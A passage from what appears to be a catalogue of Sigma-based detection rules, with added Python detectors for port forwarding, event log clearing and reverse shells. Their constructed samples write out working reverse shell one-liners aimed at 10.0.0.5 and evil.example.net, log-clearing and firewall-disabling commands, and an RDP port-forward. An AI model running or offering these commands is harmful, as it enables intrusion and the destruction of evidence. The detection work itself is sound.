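    body = toks[1:]
    for keyword in ("interface", "portproxy", "add"):
        if not body or not keyword.startswith(body[0]):
            return None
        body = body[1:]
    if not body or body[0] not in _FAMILIES:
        return None
    kv = dict(t.split("=", 1) for t in body[1:] if "=" in t)
    return {
        "family": body[0],
        "listenaddress": kv.get("listenaddress", "*"),
        "listenport": kv.get("listenport"),
        "connectaddress": kv.get("connectaddress"),
        "connectport": kv.get("connectport"),
    }


def netsh_portproxy_verdict(cmdline: str) -> Optional[str]:
    rule = parse_netsh_portproxy_add(cmdline)
    if rule is None:
        return None
    if "3389" in (rule["listenport"], rule["connectport"]):
        return "rdp_port_forwarding"
    return "port_forwarding"


def is_portproxy_registry_write(ev: dict) -> bool:
    """Sysmon-style registry event (EventID 12 CreateKey / 13 SetValue) under
    the key netsh writes the rule to; catches the same change when process
    telemetry was missed or the key was edited directly."""
    target = str(ev.get("TargetObject", "")).lower()
    return ev.get("EventID") in (12, 13) and target.startswith(PORTPROXY_KEY)


# Constructed command lines and registry events (not real telemetry).
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=10.0.0.5",
    "netsh i p a v4tov4 listenport=8443 connectport=3389 connectaddress=10.0.0.7",
    "netsh interface portproxy show all",
    "netsh advfirewall set allprofiles state off",
]
SAMPLE_REGISTRY = [
    {"EventID": 13, "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp\0.0.0.0/8443",
     "Details": "10.0.0.7/3389"},
    {"EventID": 13, "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Domain",
     "Details": "corp.example"},
]


def scan_commands(cmdlines=SAMPLE_CMDLINES):
    return [netsh_portproxy_verdict(c) for c in cmdlines]


def scan_registry(events=SAMPLE_REGISTRY):
    return [is_portproxy_registry_write(e) for e in events]


if __name__ == "__main__":
    for cmd, verdict in zip(SAMPLE_CMDLINES, scan_commands()):
        print(f"{verdict!s:22} {cmd}")
    for ev, hit in zip(SAMPLE_REGISTRY, scan_registry()):
        print(f"{hit!s:22} {ev['TargetObject']}")
```

The registry check is the more robust of the two because the rule persists there across reboots whatever tool wrote it; the command-line check adds the listen and connect endpoints, which is what an analyst needs to decide whether the forwarded port exposes RDP.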

Building Block BB:BehaviorDefinition: Possible Linux Privilege Escalation Detects suspicious shell commands that indicate the information-gathering phase that precedes privilege escalation. Based on the Privilege Escalation Preparation Sigma rule by Patrick Bareiss.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Possible Unauthorized MBR Modifications Detects possible malicious unauthorized usage of bcdedit.exe. Based on the Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE Sigma rule by @neu5ron.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Potential Equation Group Indicators Detects suspicious shell commands used in various Equation Group scripts and tools. Based on the Equation Group Indicators Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: PowerShell File Download Activity Detects when PowerShell is used to download files.
Building Block BB:BehaviorDefinition: Powercat Execution Detects powercat execution. Based on the Netcat The Powershell Version Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Powershell File and Directory Discovery Detects PowerShell commands that enumerate files and folders on the file system. Based on the Powershell File and Directory Discovery Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Prefetch File Deletion Detects the deletion of a prefetch file. Based on the Prefetch File Deleted Sigma rule by Cedric MAURUGEON.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Proxy Execution Via Explorer Detects the use of explorer.exe for evading defense mechanisms. Based on the Proxy Execution Via Explorer.exe Sigma rule by Furkan CALISKAN, @caliskanfurkan_, and @oscd_initiative.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Regsvr32 Command Line Without DLL Detects a regsvr32.exe execution whose command line does not contain a DLL. Based on the Regsvr32 Command Line Without DLL Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Root Certificate Installed via CertMgr Detects adversaries installing a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Based on the Root Certificate Installed Sigma rule by oscd.community, @redcanary, and Zach Stanford @svch0st.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Root Certificate Installed via Certutil Detects adversaries installing a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Based on the Root Certificate Installed Sigma rule by oscd.community, @redcanary, and Zach Stanford @svch0st.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Runs COM Object via Verclsid Detects when verclsid.exe is used to run a COM object by GUID. Based on the Verclsid.exe Runs COM Object Sigma rule by Victor Sergeev, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Scheduled Cron Task Detects the use of the cron utility to create a scheduled job.
Building Block BB:BehaviorDefinition: Scheduled Cron Task/Job - Linux Detects the use of the cron utility to create a scheduled job. Based on the Scheduled Cron Task/Job - Linux Sigma rule by Alejandro Ortuno, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Scheduled Task Write to System32 Tasks Detects the creation of tasks from processes executed from suspicious locations. Based on the Suspicious Scheduled Task Write to System32 Tasks Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Scheduled Task/Job - Windows Detects an uncommon scheduled task, such as one scheduled to run once at 00:00. Based on the Uncommon Scheduled Task Once 00:00 Sigma rule by pH-T.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Script Interpreter Execution From Suspicious Folder Detects suspicious script execution from temporary folders or from folders that are reachable through environment variables. Based on the Script Interpreter Execution From Suspicious Folder Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Security Software Discovery - Linux Detects the use of system utilities to discover installed security software. Based on the Security Software Discovery - Linux Sigma rule by Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Security Software Discovery - Powershell Detects PowerShell security software discovery. Based on the Security Software Discovery by Powershell Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Set Windows System File with Attrib Detects files being marked as system files by using the attrib.exe utility. Based on the Set Files as System Files Using Attrib.EXE Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Specified Binary Execution via Devtoolslauncher or OpenWith Detects when OpenWith.exe or Devtoolslauncher.exe executes another binary. Based on the OpenWith.exe Executes Specified Binary Sigma rule by Beyu Denis, oscd.community (rule), and @harr0ey (idea).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Squirrel Lolbin Detects possible use of the Squirrel package manager as a LOLBin. Based on the Squirrel Lolbin Sigma rule by Karneades / Markus Neis, Jonhnathan Ribeiro, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Startup Shortcut Created Detects when a service creates a shortcut under Windows startup folder.
Building Block BB:BehaviorDefinition: Suspicious Activity in Shell Commands Detects suspicious shell commands used in various code exploits. Based on the Suspicious Activity in Shell Commands Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Atbroker Execution Detects Atbroker executing non-default Assistive Technology applications. Based on the Suspicious Atbroker Execution Sigma rule by Mateusz Wydra, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Cabinet File Expansion Detects the use of the built-in expand utility to decompress CAB files. Based on the Suspicious Cabinet File Expansion Sigma rule by Bhabesh Raj.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Commands Linux Detects relevant commands often related to malware or hacking activity. Based on the Suspicious Commands Linux Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Delete Command Detects suspicious command lines that delete EXE or DLL files. Based on the Greedy File Deletion Using Del Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Eventlog Cleared via PowerShell Detects clearing of eventlogs using PowerShell. Based on the Suspicious Eventlog Clear or Configuration Change Sigma rule by Ecco, Daniil Yugoslavskiy, oscd.community, and D3F7A5105.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Eventlog Cleared via WMIC Detects clearing of eventlogs using wmic. Based on the Suspicious Eventlog Clear or Configuration Change Sigma rule by Ecco, Daniil Yugoslavskiy, oscd.community, and D3F7A5105.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Eventlog Cleared via Wevtutil Detects clearing of eventlogs using wevtutil. Based on the Suspicious Eventlog Clear or Configuration Change Sigma rule by Ecco, Daniil Yugoslavskiy, oscd.community, and D3F7A5105.

Used under Detection Rule License 1.1.
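
The three "Suspicious Eventlog Cleared via ..." building blocks above cover the same action through three different tools. The following is an added example, not the content extension's tests and not code from the Sigma rule authors: it classifies constructed process-creation command lines into (tool, action, log name), distinguishing a clear from a configuration change that disables or shrinks a log, and leaves read-only queries alone. The sample command lines are constructed; the tokenisation is an assumption that handles the common quoting forms but not log names containing spaces.

```python
# Added example (not the content extension's tests): classify event log
# clearing and log configuration changes from constructed command lines.
import re
from typing import Optional, Tuple

Verdict = Tuple[str, str, Optional[str]]  # (tool, action, log name)

_WEVTUTIL_CLEAR = {"cl", "clear-log"}
_WEVTUTIL_SET = {"sl", "set-log"}
# set-log switches that disable the log, move its file or shrink it
_WEVTUTIL_TAMPER_SWITCHES = ("/e:false", "/lfn:", "/ms:")
_PS_CMDLET = re.compile(r"\b(clear|remove|limit)-eventlog\b(?:\s+-logname)?\s+['\"]?([\w/-]+)", re.I)
_WMIC_CALL = re.compile(r"\bcall\s+cleareventlog\b", re.I)
_WMIC_LOG = re.compile(r"logfilename\s*=\s*'([^']+)'", re.I)


def _image(token: str) -> str:
    """Basename of the process image without quotes or .exe, lower-cased."""
    return token.strip('"').rsplit("\\", 1)[-1].lower().removesuffix(".exe")


def eventlog_tamper_verdict(cmdline: str) -> Optional[Verdict]:
    toks = cmdline.strip().split()
    if not toks:
        return None
    exe = _image(toks[0])
    args = [t.strip('"') for t in toks[1:]]
    low = [a.lower() for a in args]
    joined = " ".join(args)

    if exe == "wevtutil":
        if len(low) < 2:
            return None
        if low[0] in _WEVTUTIL_CLEAR:
            return ("wevtutil", "clear", args[1])
        if low[0] in _WEVTUTIL_SET and any(a.startswith(_WEVTUTIL_TAMPER_SWITCHES) for a in low[2:]):
            return ("wevtutil", "configure", args[1])
        return None  # qe, gl, el and other read-only verbs

    if exe == "wmic":
        if _WMIC_CALL.search(joined):
            m = _WMIC_LOG.search(joined)
            return ("wmic", "clear", m.group(1) if m else None)
        return None

    if exe in ("powershell", "pwsh"):
        m = _PS_CMDLET.search(joined)
        if m:
            action = "configure" if m.group(1).lower() == "limit" else "clear"
            return ("powershell", action, m.group(2))
        return None

    return None


# Constructed process-creation command lines (not real telemetry).
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\wevtutil.exe cl Security",
    r'wevtutil.exe clear-log "Microsoft-Windows-Sysmon/Operational"',
    "wevtutil sl Security /e:false",
    "wmic.exe nteventlog where \"LogFileName='Security'\" call ClearEventLog",
    'powershell.exe -NoP -c "Clear-EventLog -LogName System"',
    'powershell -Command "Limit-EventLog -LogName Security -MaximumSize 64KB"',
    r"wevtutil.exe qe Security /c:5 /f:text",                 # read-only query
    'powershell.exe -c "Get-EventLog -LogName Security -Newest 10"',  # read-only
]


def scan(cmdlines=SAMPLE_CMDLINES):
    return [eventlog_tamper_verdict(c) for c in cmdlines]


if __name__ == "__main__":
    for cmd, verdict in zip(SAMPLE_CMDLINES, scan()):
        print(f"{verdict!s:55} {cmd}")
```

Command-line matching misses PowerShell that arrives as -EncodedCommand or inside a script file; for those, the same cmdlet names are better looked for in script block logging (event 4104), and the Security log's own event 1102 (audit log cleared) is the authoritative confirmation that a clear actually happened.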

Building Block BB:BehaviorDefinition: Suspicious Group And Account Reconnaissance Activity Using Net.EXE Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE. Based on the Suspicious Group And Account Reconnaissance Activity Using Net.EXE Sigma rule by Florian Roth (Nextron Systems), omkar72, @svch0st, and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Load DLL and Extexport Execution Detects the use of CertOC.exe to load a DLL file under the guise of installing certificates. It also detects Extexport.exe loading a DLL, or running from a folder other than its original path. Based on the Suspicious Extexport Execution Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Load of Advapi31 Detects the load of advapi31.dll by a process that runs in an uncommon folder. Based on the Suspicious Load of Advapi31.dll Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Loaders Detects different loaders used by the Lazarus group activity. Based on the Lazarus Loaders Sigma rule by Florian Roth, and wagga.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Net Execution Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet. Based on the Net.exe Execution Sigma rule by Michael Haag, Mark Woan (improvements), James Pemberton, @4A616D6573, and oscd.community (improvements).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Obfuscation Character in Commandline Detects possible payload obfuscation via the command line. Based on the Suspicious Dosfuscation Character in Commandline Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious Registration via cscript Detects the registration of a VSS/VDS Provider as a COM+ application.
Building Block BB:BehaviorDefinition: Suspicious Remote Logon with Explicit Credentials Detects suspicious processes logging on with explicit credentials.
Building Block BB:BehaviorDefinition: Suspicious Reverse Shell Command Line Detects suspicious shell commands or program code that can be executed or used in a command line to establish a reverse shell. Based on the Suspicious Reverse Shell Command Line Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.
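
The reverse shell building block above is a string-based detection, and the strings it looks for share a structure: a shell, an interpreter or a relay tool wired to a remote host and port. The following is an added example, not the content extension's tests and not code from the Sigma rule author: it recognises the common bash /dev/tcp, exec-fd, FIFO/netcat, Python dup2, socat and netcat -e forms over constructed command lines and extracts the destination host and port so the alert carries the C2 endpoint. The patterns are my approximations of the public rule's strings, and the samples are constructed; two benign look-alikes (a port check and a /dev/tcp connectivity probe) show where the patterns deliberately do not fire.

```python
# Added example (not the content extension's tests): reverse shell command
# line patterns that also extract the destination host and port.
import re
from typing import Optional, Tuple

Verdict = Tuple[str, str, int]  # (technique, host, port)

# Each pattern captures host and port; these approximate the public rule's strings.
_PATTERNS = [
    ("bash_dev_tcp", re.compile(r"\b(?:ba)?sh\s+-i\s+>&\s*/dev/(?:tcp|udp)/([\w.\-]+)/(\d+)")),
    ("bash_exec_fd", re.compile(r"\bexec\s+\d+<>\s*/dev/(?:tcp|udp)/([\w.\-]+)/(\d+)")),
    ("fifo_backpipe", re.compile(r"\bmk(?:fifo|nod)\s+\S+.*\bnc\b[^;|]*?\s([\w.\-]+)\s+(\d+)\b")),
    ("python_dup2", re.compile(r"socket\.socket\(.*?\.connect\(\(\s*['\"]([\w.\-]+)['\"]\s*,\s*(\d+)\s*\)\).*?\bdup2\(")),
    ("socat_pty", re.compile(r"\bsocat\b.*\bexec:.*\btcp:([\w.\-]+):(\d+)")),
]

_NC_NAMES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
_EXEC_FLAGS = {"-e", "--exec"}


def _netcat_exec(cmd: str) -> Optional[Tuple[str, int]]:
    """nc/ncat with -e/--exec; host and port are the remaining positional
    arguments.  Assumption: -e is a separate token (combined flags such as
    -lvpe and the -c/--sh-exec quoted forms are not parsed here)."""
    toks = cmd.split()
    for i, t in enumerate(toks):
        if t.rsplit("/", 1)[-1] in _NC_NAMES:
            rest = toks[i + 1:]
            break
    else:
        return None
    if not any(t in _EXEC_FLAGS for t in rest):
        return None
    positional = [
        t for j, t in enumerate(rest)
        if not t.startswith("-") and (j == 0 or rest[j - 1] not in _EXEC_FLAGS)
    ]
    if len(positional) < 2 or not positional[-1].isdigit():
        return None
    return positional[-2], int(positional[-1])


def reverse_shell_verdict(cmd: str) -> Optional[Verdict]:
    for name, rx in _PATTERNS:
        m = rx.search(cmd)
        if m:
            return name, m.group(1), int(m.group(2))
    nc = _netcat_exec(cmd)
    if nc:
        return "netcat_exec", nc[0], nc[1]
    return None


# Constructed command lines (not real telemetry).
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/10.0.0.5/4444 0>&1",
    "/bin/bash -c 'exec 5<>/dev/tcp/evil.example.net/443; cat <&5 | while read line; do $line 2>&5 >&5; done'",
    "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.5 4444 > /tmp/f",
    """python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'""",
    "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.5:4444",
    "ncat 10.0.0.5 4444 -e /bin/bash",
    "nc -zv 10.0.0.5 443",                    # benign port check: no -e
    "bash -c 'cat < /dev/tcp/10.0.0.5/443'",  # benign connectivity probe: no -i
]


def scan(cmdlines=SAMPLE_CMDLINES):
    return [reverse_shell_verdict(c) for c in cmdlines]


if __name__ == "__main__":
    for cmd, verdict in zip(SAMPLE_CMDLINES, scan()):
        print(f"{verdict!s:45} {cmd[:60]}")
```

Extracting the endpoint matters in practice: the host and port can be pivoted straight into network telemetry to confirm the connection was made, and an internal destination (a jump host used by an operations team) can be excluded without loosening the pattern itself.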

Building Block BB:BehaviorDefinition: Suspicious Script Execution From Temp Folder Detects suspicious script execution from a temporary folder. Based on the Suspicious Script Execution From Temp Folder Sigma rule by Florian Roth, Max Altgelt, and Tim Shelton.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Suspicious ZipExec Execution Detects the use of ZipExec which is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. Based on the Suspicious ZipExec Execution Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Svchost Incoming Connection Detects suspicious incoming connections to the svchost.exe process.
Building Block BB:BehaviorDefinition: Sysinternals SDelete File Deletion Detects the deletion of files by Sysinternals SDelete. Based on the File Deleted Via Sysinternals SDelete Sigma rule by Roberto Rodriguez (Cyb3rWard0g), and OTR (Open Threat Research).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Sysmon Driver Unload Detects possible Sysmon driver unload. Based on the Sysmon Driver Unload Sigma rule by Kirill Kiryanov, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: TaskCache Registry Modification Detects suspicious registry modifications to the TaskCache key. Based on the Scheduled TaskCache Change by Uncommon Program Sigma rule by Syed Hasan (@syedhasan009).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Terminal Server Client Connection History Cleared - Registry Detects the deletion of registry keys containing the MSTSC connection history. Based on the Terminal Server Client Connection History Cleared - Registry Sigma rule by Christian Burkard (Nextron Systems).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Turla Group Lateral Movement Detects automated lateral movement by Turla group. Based on the Turla Group Lateral Movement Sigma rule by Markus Neis.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Turla LightNeuron Installation Triggers when Turla LightNeuron is installed.
Building Block BB:BehaviorDefinition: Turla LightNeuron Objects Triggers when a Turla LightNeuron object is loaded.
Building Block BB:BehaviorDefinition: User Added to Local Administrators Detects user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity.
Building Block BB:BehaviorDefinition: User Agent Changed via Curl Detects a suspicious curl process start with a changed user agent. Based on the Suspicious Curl Change User Agents - Linux Sigma rule by Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: User Agent Changed via Powershell Detects embedding of suspicious commands into a user agent. Based on the Change User Agents with WebRequest Sigma rule by frack113.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: WinDbg/CDB LOLBIN Usage and Application Whitelisting Bypass via Dxcap.exe Detects execution of Dxcap.exe and also detects usage of cdb.exe to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file. Based on the WinDbg/CDB LOLBIN Usage Sigma rule by Beyu Denis, oscd.community, and Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Windows Shell/Scripting Processes Spawning Suspicious Programs Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, and mshta. Based on the Windows Shell/Scripting Processes Spawning Suspicious Programs Sigma rule by Florian Roth (Nextron Systems), and Tim Shelton.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Windows Software Discovery Triggers when Windows software is discovered. Based on the Detected Windows Software Discovery Sigma rule by Nikita Nazarov, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Windows Software Discovery - PowerShell Triggers when Windows software is discovered by using PowerShell. Based on the Detected Windows Software Discovery - PowerShell Sigma rule by Nikita Nazarov, and oscd.community.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Windows Spooler Service Binary Load Detects a DLL load from the Spooler Service backup folder. Based on the Windows Spooler Service Suspicious Binary Load Sigma rule by FPT.EagleEye, and Thomas Patzke (improvements).

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Windows Spooler Service File Deletion Detects DLL deletions from the Spooler Service driver folder. Based on the Windows Spooler Service Suspicious File Deletion Sigma rule by Bhabesh Raj.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Windows Update Client LOLBIN Detects code execution via the Windows Update client. Based on the Windows Update Client LOLBIN Sigma rule by FPT.EagleEye Team.

Used under Detection Rule License 1.1.

Building Block BB:BehaviorDefinition: Write Protect For Storage Disabled Detects changes to registry to disable any write-protect property for storage devices. Based on the Write Protect For Storage Disabled Sigma rule by Sreeman.

Used under Detection Rule License 1.1.

Building Block BB:CategoryDefinition: File Permission Changed Defines when a command has been executed to change the permissions assigned to a file.
Building Block BB:CategoryDefinition: Object Download Events Edit this Building Block to include all object (file, folder, etc) download related event categories.
Building Block BB:DeviceDefinition: Endpoint Devices Defines the endpoint devices on the system.
Rule Access Token Abuse Detects token impersonation and theft. Based on the Access Token Abuse Sigma rule by Michaela Adams, and Zach Mathis.

Used under Detection Rule License 1.1.

Rule Access to ADMIN$ Share Detects access to the ADMIN$ share. Based on the Access to ADMIN$ Share Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule Active Directory Group/Computer Enumeration Triggers when a group or a computer is enumerated within Active Directory. Based on the Active Directory Group Enumeration With Get-AdGroup and Active Directory Computers Enumeration with Get-AdComputer Sigma rules by frack113.

Used under Detection Rule License 1.1.

Rule Active Directory Kerberos DLL Loaded Via Office Application Detects Kerberos DLL being loaded by a Microsoft Office product. Based on the Active Directory Kerberos DLL Loaded Via Office Application Sigma rule by Antonlovesdnb.

Used under Detection Rule License 1.1.

Rule Active Directory Parsing DLL Loaded Via Office Application Detects DSParse DLL being loaded by a Microsoft Office product. Based on the Active Directory Parsing DLL Loaded Via Office Application Sigma rule by Antonlovesdnb.

Used under Detection Rule License 1.1.

Rule Alternate Data Streams Writing Files Detects Alternate Data Stream (ADS) writing files. ADS may be used to store configuration files. Based on the NTFS Alternate Data Stream Sigma rule by Sami Ruohonen.

Used under Detection Rule License 1.1.

Rule Attempt to bypass UAC via Windows Firewall Snap-In Hijacking Detects attempts to bypass UAC via Windows firewall snap-in.

For more information about this attack, see UAC Bypass via Windows Firewall Snap-In Hijack.

Rule Automated Collection Commands Detects an adversary using automated techniques for collecting internal data.
Rule CLR DLL Loaded Via Office Application Detects CLR DLL being loaded by a Microsoft Office product. Based on the CLR DLL Loaded Via Office Applications Sigma rule by Antonlovesdnb.

Used under Detection Rule License 1.1.

Rule CLR DLL Loaded Via Scripting Applications Detects CLR DLLs being loaded by scripting applications. Based on the DotNet CLR DLL Loaded By Scripting Applications Sigma rule by omkar72, and oscd.community.

Used under Detection Rule License 1.1.

Rule COM Hijacking With Suspicious Locations Detects potential COM hijacking where the 'Server' (In/Out) is pointing to a suspicious location. Based on the COM Hijacking For Persistence With Suspicious Locations Sigma rule by Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Rule COM Hijacking via Sdclt Detects potential COM hijacking via Sdclt. Based on the COM Hijack via Sdclt Sigma rule by Omkar Gudhate.

Used under Detection Rule License 1.1.

Rule COM Object Downloading Cradles Detects usage of COM objects that can be abused to download files in PowerShell by CLSID. Based on the Potential COM Objects Download Cradles Usage - PS Script Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Certutil Initiated Connection Detects a network connection initiated by the certutil.exe tool. Attackers can abuse certutil.exe to download malware or offensive security tools. Based on the Certutil Initiated Connection Sigma rule by frack113, and Florian Roth.

Used under Detection Rule License 1.1.

Rule Clear Command History Detects clear command history activity.
Rule ComRat Registry Service Installation Triggers when a ComRat service is installed and a payload is written into the registry. This could indicate existing access, such as compromised credentials or a previously installed backdoor.
Rule Command Executed via SettingContent-ms Detects command executed via SettingContent-ms. Based on the Arbitrary Shell Command Execution Via Settingcontent-Ms Sigma rule by Sreeman.

Used under Detection Rule License 1.1.

Rule Command Line Execution with Suspicious URL and AppData Strings Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers. Based on the Command Line Execution with Suspicious URL and AppData Strings Sigma rule by Florian Roth, Jonhnathan Ribeiro, and oscd.community.

Used under Detection Rule License 1.1.

Rule Communication to EquationGroup C2 Tools Detects communications to C2 servers. Based on the Equation Group C2 Communication Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule Copying Sensitive Files with Credential Data Detects attempts to copy sensitive files with credential data. Based on the Copying Sensitive Files with Credential Data Sigma rule by Teymur Kheirkhabarov, Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Rule Creation of Outlook C2 Macro File Detects creation of an Outlook C2 macro file. Based on the Outlook C2 Macro Creation Sigma rule by @ScoubiMtl.

Used under Detection Rule License 1.1.

Rule Creation of Suspicious Executable Files Detects creation of suspicious executable files. Based on the Suspicious Executable File Creation Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Creation or Modification of Assistive Technology Applications Detects creation or modification of Assistive Technology applications. Based on the Atbroker Registry Change Sigma rule by Mateusz Wydra, and oscd.community.

Used under Detection Rule License 1.1.

Rule Creation or Modification of a new GPO Scheduled Task or Service Detects the creation or modification of a new Group Policy based scheduled task or service. Based on the Persistence and Execution at Scale via GPO Scheduled Task Sigma rule by Samir Bousseaden.

Used under Detection Rule License 1.1.

Rule Credential Dumping Tools Named Pipes Detects well-known credential dumping tools execution via specific named pipes. Based on the Cred Dump-Tools Named Pipes Sigma rule by Teymur Kheirkhabarov, and oscd.community.

Used under Detection Rule License 1.1.

Rule Curl Download And Execute Combination Detects potential attackers using curl to download payloads remotely and execute them. Based on the Curl Download And Execute Combination Sigma rule by Sreeman, and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule DNS Exfiltration Tools Execution Detects DNS exfiltration tool execution. Based on the DNS Exfiltration and Tunneling Tools Execution Sigma rule by Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Rule DNS Exfiltration in Powershell Detects DNS exfiltration in PowerShell. Based on the Powershell DNSExfiltration Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule DNS HybridConnectionManager Service Bus Detects Hybrid Connection Manager querying the service bus. Based on the DNS HybridConnectionManager Service Bus Sigma rule by Roberto Rodriguez (Cyb3rWard0g), and OTR (Open Threat Research).

Used under Detection Rule License 1.1.

Rule DarkSide Ransomware Activity Detected Detects DarkSide ransomware activity. Based on the DarkSide Ransomware Pattern Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule Data Split into Pieces (Mac) Detects data split into pieces. Based on the Split A File Into Pieces Sigma rule by Igor Fits, Mikhail Larin, and oscd.community.

Used under Detection Rule License 1.1.

Rule Data Split into Pieces (Unix) Detects data split into pieces. Based on the Split A File Into Pieces - Linux Sigma rule by Igor Fits, and oscd.community.

Used under Detection Rule License 1.1.

Rule Default Accounts Used Detects default accounts used. Based on the Suspicious Manipulation Of Default Accounts Sigma rule by Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Rule Disable Windows Defender Functionalities Via Registry Keys Detects when attackers disable Windows Defender functionality by using the Windows registry. Based on the Disable Windows Defender Functionalities Via Registry Keys Sigma rule by AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, and Swachchhanda Shrawan Poudel.

Used under Detection Rule License 1.1.
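
The Defender registry rule above is a value-level detection: the same key can carry a write that disables protection and a write that restores it, and only the former is an alert. The following is an added example, not the content extension's rule logic and not code from the Sigma rule authors: it evaluates constructed Sysmon-style registry value-set events (EventID 13) against the Defender policy paths, parses Sysmon's "DWORD (0x...)" rendering, and separates the values where 1 disables a component from the values where 0 switches cloud protection off. The value names approximate the public rule's list; the event shape and sample events are assumptions.

```python
# Added example (not the content extension's rule logic): Defender registry
# tampering over constructed Sysmon EventID 13 (SetValue) events.
import re
from typing import Optional

_DEFENDER_BASES = (
    r"\software\policies\microsoft\windows defender",
    r"\software\microsoft\windows defender",
)
# DWORD 1 here switches a protection component off
_DISABLE_WHEN_ONE = {
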